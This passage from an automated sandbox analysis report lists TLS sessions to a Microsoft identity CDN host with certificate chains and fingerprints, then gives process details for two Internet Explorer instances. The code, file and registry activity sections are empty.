Jul 9, 2019 03:22:37.643217087 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49727 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |
Jul 9, 2019 03:22:37.643553019 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49729 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |
Jul 9, 2019 03:22:37.643855095 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49728 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |
Jul 9, 2019 03:22:37.646456957 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49730 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |
Jul 9, 2019 03:22:37.646611929 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49726 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |

Code Manipulations

Statistics

Behavior
• iexplore.exe
• iexplore.exe

System Behavior
Analysis Process: iexplore.exe PID: 4576 Parent PID: 692

General
Start time: 03:22:14
Start date: 09/07/2019
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff7033a0000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Registry Activities

Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576

General
Start time: 03:22:15
Start date: 09/07/2019
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2
Imagebase: 0x1080000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Registry Activities

Disassembly